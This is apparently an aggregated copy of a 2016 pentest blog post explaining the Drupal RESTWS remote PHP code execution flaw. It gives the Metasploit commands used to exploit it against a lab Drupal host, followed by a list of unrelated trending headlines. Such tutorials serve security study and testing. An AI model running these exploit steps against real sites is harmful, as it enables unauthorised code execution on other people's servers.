Channel: Hacking Articles|Raj Chandel's Blog

↧

Hack Drupal Website using Drupal RESTWS Module Remote PHP Code Execution

July 29, 2016, 10:52 pm

≫ Next: Hack Remote Windows 10 PC using FatRat

≪ Previous: Firewall Pentest Lab Setup with pfsense in Vmware

This module exploits a Remote PHP Code Execution vulnerability in Drupal RESTWS Module. Unauthenticated users can execute arbitrary code under the context of the web server user. RESTWS alters the default page callbacks for entities to provide additional functionality. A vulnerability in this approach allows an unauthenticated attacker to send specially crafted requests resulting in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7 versions are affected by issue. This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.

Exploit Targets

RESTWS 2.x

Requirement

Attacker: kali Linux

Victim PC: drupal

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/drupal_restws_exec

msf exploit (drupal_restws_exec)>set targeturi /

msf exploit (drupal_restws_exec)>set rhost 192.168.0.4 (IP of Remote Host)

msf exploit(drupal_restws_exec)>set rport 80

msf exploit (drupal_restws_exec)>exploit

↧

Trending Articles

Avril Lavigne – Let Go (20th Anniversary Edition) [iTunes Plus M4A]

December 14, 2024, 3:04 am

Fushigi no Dungeon – Furai no Shiren 3: Karakuri Yashiki no Nemuri Hime (JPN)

October 24, 2017, 1:48 am

LAG, Lacp configuration on Mellanox switches

January 28, 2015, 3:27 pm

Who's been in court? A round up of cases heard by Essex magistrates

September 27, 2014, 10:00 pm

Man dies and another in serious condition after A614 crash between Driffield...

August 16, 2012, 2:58 am

Sarah Samis, Emil Bove III

November 17, 2012, 9:36 pm

Papa Roach – Greatest Hits Vol.2 The Better Noise Years (2021) [FLAC...

September 17, 2021, 5:06 am

Terry Bon Chaka — Zoozey (Ft. KK Fosu) #ThrowBack

July 22, 2015, 3:40 am

Novel : I Love You, Stupid! 2

August 14, 2012, 7:38 pm

Dante Kennybrew, 19

October 3, 2018, 12:00 am

Man charged with July slaying of Jovan Hopkins in Back of the Yards

August 23, 2015, 12:33 pm

Download: FK ft Shenky – Nakuyewa ”Prod by: Shenky”

February 16, 2017, 4:24 pm

Practice Sheet of Pronoun References for HSC Students

October 19, 2019, 11:55 pm

मुख मैथुन से उठाएं सेक्स का भरपूर मज़ा, जानें क्या है इसका सही तरीकामुख मैथुन...

May 17, 2020, 2:04 pm

NCERT Solutions for Class 9th Sanskrit Chapter 3 पाथेयम्

December 22, 2016, 3:50 am

99 God Status for Whatsapp, Facebook

June 5, 2016, 11:46 pm

The Angry Birds Movie (Tamil Dubbed)

May 29, 2016, 1:08 am

Casualty cut free following three-car collision in Newtown Unthank

September 18, 2014, 11:19 am

David Kushner – The Dichotomy [iTunes Plus M4A]

August 31, 2024, 6:05 am

Three walk

November 18, 2016, 2:00 am

© 2025 //www.rssing.com